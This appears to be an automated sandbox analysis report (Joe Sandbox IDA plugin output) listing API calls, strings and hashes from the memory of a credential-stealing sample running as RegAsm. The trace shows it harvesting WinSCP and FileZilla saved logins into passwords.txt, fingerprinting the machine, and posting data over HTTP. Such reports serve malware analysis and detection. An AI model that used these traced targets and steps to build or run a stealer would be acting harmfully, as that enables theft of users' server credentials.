                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrlenA.KERNEL32(?,?,?,?,?,?,00421789,000000FF,?,004183A3,?,00CB2F60,?), ref: 0040FEFC
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FF27
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcat.KERNEL32(?,?), ref: 0040FF31
                                                                                                                                                                                                              • Part of subcall function 0040FDE0: lstrcpy.KERNEL32(00000000), ref: 0040FE20
                                                                                                                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 00410A5E
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00410A69
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Process32lstrcpy$Next$CloseCreateFirstHandleSnapshotToolhelp32lstrcatlstrlen
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 562399079-0
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411AE9
                                                                                                                                                                                                            • Process32First.KERNEL32(00000000,00000128), ref: 00411AF9
                                                                                                                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 00411B0B
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,?), ref: 00411B20
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00411B42
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 420147892-0
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 00411624
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,00404DDA,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00411633
                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,?,00404DDA,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041163A
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$AllocateBinaryCryptProcessString
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 869800140-0
                                                                                                                                                                                                            • Opcode ID: a5bc244c91944e159526dac87f2701fa0a5e61637d43ef5c594d15196ce9044e
                                                                                                                                                                                                            • Instruction ID: db228fde36600b89e308864814a0fd4187c9bf3bc2b87e83fcb48dcf596a97a1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a5bc244c91944e159526dac87f2701fa0a5e61637d43ef5c594d15196ce9044e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DA112171640219ABDB10CFA5EC85EEBB7ADFF4A361F10455AFE09D7200D772DC508AA0
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200,?,?,00000001), ref: 004102E6
                                                                                                                                                                                                            • LocalFree.KERNEL32(?,?,?,00000001), ref: 0041038A
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrlenA.KERNEL32(?,?,?,?,?,?,00421789,000000FF,?,004183A3,?,00CB2F60,?), ref: 0040FEFC
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FF27
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcat.KERNEL32(?,?), ref: 0040FF31
                                                                                                                                                                                                              • Part of subcall function 0040FDE0: lstrcpy.KERNEL32(00000000), ref: 0040FE20
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: lstrcpy$FreeInfoLocalLocalelstrcatlstrlen
                                                                                                                                                                                                            • String ID: /
                                                                                                                                                                                                            • API String ID: 3280604673-4001269591
                                                                                                                                                                                                            • Opcode ID: 7048e50621e4d5d4819c872da963360d29b9e3b6f0ee254219a64908d19711aa
                                                                                                                                                                                                            • Instruction ID: ce17fd588857d30347beb69bbde86745f8abd7f3fa5c559c97b60cfac1502add
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7048e50621e4d5d4819c872da963360d29b9e3b6f0ee254219a64908d19711aa
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F5116371A00158DBCB14DBD4C885BFDB7B9BF58300F14006EF606B3182D7785A85CBA5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00418382,004271D3), ref: 0041010C
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,00418382,004271D3), ref: 00410113
                                                                                                                                                                                                            • GetUserNameA.ADVAPI32(00000000,004271D3), ref: 00410127
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$AllocNameProcessUser
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1206570057-0
                                                                                                                                                                                                            • Opcode ID: 473499ec4a489346d5b8381035135aa7156d3b2d8f7926a473b752b9a765c721
                                                                                                                                                                                                            • Instruction ID: 19b93291ffa213a11ad41bdc802fd7864df3898d1af9124162a70396b117772a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 473499ec4a489346d5b8381035135aa7156d3b2d8f7926a473b752b9a765c721
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 88D012B9551228BBE7009BD49D0DFDA7B6DDB06751F001192FB05D3240D5F0590047E1
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: InfoSystemwsprintf
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2452939696-0
                                                                                                                                                                                                            • Opcode ID: 67813cff432e2db0abc94fc5d10f6a9c4c33d96fd4943461a3550aebf9622d91
                                                                                                                                                                                                            • Instruction ID: fd568a378e61f9dd8032745bc5ed726e10135009153e67747a24499c39be525b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 67813cff432e2db0abc94fc5d10f6a9c4c33d96fd4943461a3550aebf9622d91
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 68D012B990011CD7C710DB90EC85AA9B77DAB48604F4046A9EF15A2140E6756A1D8AE5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CB2920), ref: 00418B62
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CC0E58), ref: 00418B7A
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CC0DB0), ref: 00418B92
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CB2760), ref: 00418BAB
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CB28C0), ref: 00418BC3
                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00CC0F00,00417C4D,?,00000040,00000064,00414050,004135F0,?,0000002C,00000064,00413FA0,00413FF0,?,00000024,00000064,00413F50), ref: 00418BD5
                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00CC0EE8), ref: 00418BE6
                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00CC0F18), ref: 00418BF8
                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00CC0DC8), ref: 00418C0A
                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00CC0F60), ref: 00418C1B
                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00CC0EB8), ref: 00418C2D
                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00CC0D68), ref: 00418C3F
                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00CC0D98), ref: 00418C50
                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00418C60
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(6F090000,HttpQueryInfoA), ref: 00419167
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(6F090000,InternetSetOptionA), ref: 0041917E
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(69E70000,SymMatchString), ref: 0041927E
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                            • String ID: HttpQueryInfoA$InternetSetOptionA$SymMatchString$dbghelp.dll
                                                                                                                                                                                                            • API String ID: 2238633743-951535364
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 0040C30B
                                                                                                                                                                                                            • memset.MSVCRT ref: 0040C32A
                                                                                                                                                                                                            • memset.MSVCRT ref: 0040C342
                                                                                                                                                                                                            • memset.MSVCRT ref: 0040C35A
                                                                                                                                                                                                            • memset.MSVCRT ref: 0040C36D
                                                                                                                                                                                                            • memset.MSVCRT ref: 0040C37B
                                                                                                                                                                                                            • memset.MSVCRT ref: 0040C38C
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,0040EB02), ref: 0040C3AE
                                                                                                                                                                                                            • RegGetValueA.ADVAPI32(0040EB02,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040C3EF
                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,0040EB02), ref: 0040C427
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memset$Open$Value
                                                                                                                                                                                                            • String ID: :22$Host: $HostName$Login: $Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 0040FD00: lstrcpy.KERNEL32(00000000,0041837D), ref: 0040FD29
                                                                                                                                                                                                              • Part of subcall function 00411550: SHGetFolderPathA.SHELL32(00000000,viB,00000000,00000000,?,00000000), ref: 00411588
                                                                                                                                                                                                              • Part of subcall function 0040FE30: lstrcpy.KERNEL32(00000000), ref: 0040FE93
                                                                                                                                                                                                              • Part of subcall function 0040FE30: lstrcat.KERNEL32(?,00000000), ref: 0040FE9F
                                                                                                                                                                                                              • Part of subcall function 0040FDE0: lstrcpy.KERNEL32(00000000), ref: 0040FE20
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrlenA.KERNEL32(?,?,?,?,?,?,00421789,000000FF,?,004183A3,?,00CB2F60,?), ref: 0040FEFC
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FF27
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcat.KERNEL32(?,?), ref: 0040FF31
                                                                                                                                                                                                              • Part of subcall function 0040FD40: lstrcpy.KERNEL32(00000000), ref: 0040FD68
                                                                                                                                                                                                              • Part of subcall function 00406D60: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000002,?,0040C83D,?,00000000,?,00000000), ref: 00406D97
                                                                                                                                                                                                              • Part of subcall function 00406D60: GetFileSizeEx.KERNEL32(00000000,?,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406DAD
                                                                                                                                                                                                              • Part of subcall function 00406D60: LocalAlloc.KERNEL32(00000040,?,00000000,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406DC8
                                                                                                                                                                                                              • Part of subcall function 00406D60: ReadFile.KERNEL32(00000000,00000000,?,00000002,00000000,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406DE1
                                                                                                                                                                                                              • Part of subcall function 00406D60: CloseHandle.KERNEL32(00000000,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406E09
                                                                                                                                                                                                              • Part of subcall function 004115B0: LocalAlloc.KERNEL32(00000040,00413B11,?,00000001,00000004,?,00413B10,00000000,00000000), ref: 004115CC
                                                                                                                                                                                                            • strtok_s.MSVCRT ref: 0040C869
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,000F423F,0042697E,0042697B,0042697A,00426977), ref: 0040C8BF
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C8C6
                                                                                                                                                                                                            • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040C8E6
                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C8F1
                                                                                                                                                                                                              • Part of subcall function 00411A30: malloc.MSVCRT ref: 00411A41
                                                                                                                                                                                                              • Part of subcall function 00411A30: strncpy.MSVCRT ref: 00411A51
                                                                                                                                                                                                            • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040C928
                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C933
                                                                                                                                                                                                            • StrStrA.SHLWAPI(00000000,<User>), ref: 0040C970
                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C97B
                                                                                                                                                                                                            • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040C9B8
                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C9C7
                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA53
                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA6B
                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA83
                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA9B
                                                                                                                                                                                                            • lstrcat.KERNEL32(00417F53,Soft: FileZilla), ref: 0040CAB3
                                                                                                                                                                                                            • lstrcat.KERNEL32(00417F53,Host: ), ref: 0040CAC2
                                                                                                                                                                                                            • lstrcat.KERNEL32(00417F53,00000000), ref: 0040CAD5
                                                                                                                                                                                                            • lstrcat.KERNEL32(00417F53,00426D50), ref: 0040CAE4
                                                                                                                                                                                                            • lstrcat.KERNEL32(00417F53,00000000), ref: 0040CAF7
                                                                                                                                                                                                            • lstrcat.KERNEL32(00417F53,00426D54), ref: 0040CB06
                                                                                                                                                                                                            • lstrcat.KERNEL32(00417F53,Login: ), ref: 0040CB15
                                                                                                                                                                                                            • lstrcat.KERNEL32(00417F53,00000000), ref: 0040CB28
                                                                                                                                                                                                            • lstrcat.KERNEL32(00417F53,00426D60), ref: 0040CB37
                                                                                                                                                                                                            • lstrcat.KERNEL32(00417F53,Password: ), ref: 0040CB46
                                                                                                                                                                                                            • lstrcat.KERNEL32(00417F53,00000000), ref: 0040CB59
                                                                                                                                                                                                            • lstrcat.KERNEL32(00417F53,00426D70), ref: 0040CB68
                                                                                                                                                                                                            • lstrcat.KERNEL32(00417F53,00426D74), ref: 0040CB77
                                                                                                                                                                                                              • Part of subcall function 0040FD90: lstrlenA.KERNEL32(00418439,?,00000000,?,00417B7D,004271CF,004271CE,00000000,?,00000000,00422B88,000000FF,?,00418439), ref: 0040FD9B
                                                                                                                                                                                                              • Part of subcall function 0040FD90: lstrcpy.KERNEL32(00000000,00418439), ref: 0040FDD2
                                                                                                                                                                                                            • strtok_s.MSVCRT ref: 0040CBBB
                                                                                                                                                                                                            • lstrlenA.KERNEL32(00417F53,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CBD1
                                                                                                                                                                                                            • memset.MSVCRT ref: 0040CC22
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: lstrcat$lstrlen$lstrcpy$AllocFile$HeapLocalstrtok_s$CloseCreateFolderHandlePathProcessReadSizemallocmemsetstrncpy
                                                                                                                                                                                                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 0040FD40: lstrcpy.KERNEL32(00000000), ref: 0040FD68
                                                                                                                                                                                                              • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043A2
                                                                                                                                                                                                              • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043AF
                                                                                                                                                                                                              • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043BC
                                                                                                                                                                                                              • Part of subcall function 00404350: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 004043D6
                                                                                                                                                                                                              • Part of subcall function 00404350: InternetCrackUrlA.WININET(00000000,00000000), ref: 004043E6
                                                                                                                                                                                                              • Part of subcall function 0040FD00: lstrcpy.KERNEL32(00000000,0041837D), ref: 0040FD29
                                                                                                                                                                                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405C8A
                                                                                                                                                                                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405E34
                                                                                                                                                                                                            • HttpOpenRequestA.WININET(00000000,00CBF430,?,00CC2020,00000000,00000000,-00400100,00000000), ref: 00405E74
                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00420071,?,00000000,00420071,",00000000,00420071,mode,00000000,00420071,00CBE8B0,00000000,00420071,00426820), ref: 00406272
                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406283
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040628E
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406295
                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004062A6
                                                                                                                                                                                                            • memcpy.MSVCRT ref: 004062B7
                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004062C8
                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004062E1
                                                                                                                                                                                                            • memcpy.MSVCRT ref: 004062EA
                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 004062FD
                                                                                                                                                                                                            • HttpSendRequestA.WININET(?,00000000,00000000), ref: 00406311
                                                                                                                                                                                                            • InternetReadFile.WININET(?,?,000000C7,00000000), ref: 00406328
                                                                                                                                                                                                            • InternetReadFile.WININET(?,00000000,000000C7,00000000), ref: 0040637E
                                                                                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00406389
                                                                                                                                                                                                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405E9B
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrlenA.KERNEL32(?,?,?,?,?,?,00421789,000000FF,?,004183A3,?,00CB2F60,?), ref: 0040FEFC
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FF27
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcat.KERNEL32(?,?), ref: 0040FF31
                                                                                                                                                                                                              • Part of subcall function 0040FE30: lstrcpy.KERNEL32(00000000), ref: 0040FE93
                                                                                                                                                                                                              • Part of subcall function 0040FE30: lstrcat.KERNEL32(?,00000000), ref: 0040FE9F
                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00406396
                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 004063A0
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00CBF2F0,?,?,?,?,?,?,00000000), ref: 00405CAA
                                                                                                                                                                                                              • Part of subcall function 0040FDE0: lstrcpy.KERNEL32(00000000), ref: 0040FE20
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Internet$lstrlen$lstrcpy$CloseHandle$FileHeapHttpOpenReadRequestlstrcatmemcpy$AllocConnectCrackOptionProcessSend
                                                                                                                                                                                                            • String ID: "$"$"$*$------$------$------$------$build_id$d~A$d~A$mode
                                                                                                                                                                                                            • API String ID: 530647464-1882268820
                                                                                                                                                                                                            • Opcode ID: fa1efbd99ebc7784c1cdbbacf0403da554903c06edd50a0d9a7fc80c2b11aa11
                                                                                                                                                                                                            • Instruction ID: bc472f71be83f28281829215804d958748811d57b1b2f0779ce4331b63c6d1e7
                                                                                                                                                                                                            • Opcode Fuzzy Hash: fa1efbd99ebc7784c1cdbbacf0403da554903c06edd50a0d9a7fc80c2b11aa11
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 00525171801148EACB15EBE5C956BEEBBB89F18304F54407EE502735C2DA786B0DCBB9
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Control-flow Graph

control_flow_graph 844 (block 415530-41636f): node and edge listing not reproduced; the API calls made along this graph are listed below.
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 0040FD00: lstrcpy.KERNEL32(00000000,0041837D), ref: 0040FD29
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrlenA.KERNEL32(?,?,?,?,?,?,00421789,000000FF,?,004183A3,?,00CB2F60,?), ref: 0040FEFC
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FF27
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcat.KERNEL32(?,?), ref: 0040FF31
                                                                                                                                                                                                              • Part of subcall function 0040FDE0: lstrcpy.KERNEL32(00000000), ref: 0040FE20
                                                                                                                                                                                                              • Part of subcall function 0040FE30: lstrcpy.KERNEL32(00000000), ref: 0040FE93
                                                                                                                                                                                                              • Part of subcall function 0040FE30: lstrcat.KERNEL32(?,00000000), ref: 0040FE9F
                                                                                                                                                                                                              • Part of subcall function 00410180: GetProcessHeap.KERNEL32(00000000,00000104,?,004271E0,00000000,?,00000000,00000000), ref: 0041018E
                                                                                                                                                                                                              • Part of subcall function 00410180: HeapAlloc.KERNEL32(00000000,?,004271E0,00000000,?,00000000,00000000), ref: 00410195
                                                                                                                                                                                                              • Part of subcall function 00410180: GetLocalTime.KERNEL32(qB,?,004271E0,00000000,?,00000000,00000000), ref: 004101A1
                                                                                                                                                                                                              • Part of subcall function 00410180: wsprintfA.USER32 ref: 004101CD
                                                                                                                                                                                                              • Part of subcall function 00410B10: memset.MSVCRT ref: 00410B35
                                                                                                                                                                                                              • Part of subcall function 00410B10: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,00000000), ref: 00410B52
                                                                                                                                                                                                              • Part of subcall function 00410B10: RegQueryValueExA.KERNEL32(00000000,MachineGuid,00000000,00000000,00000000,000000FF), ref: 00410B74
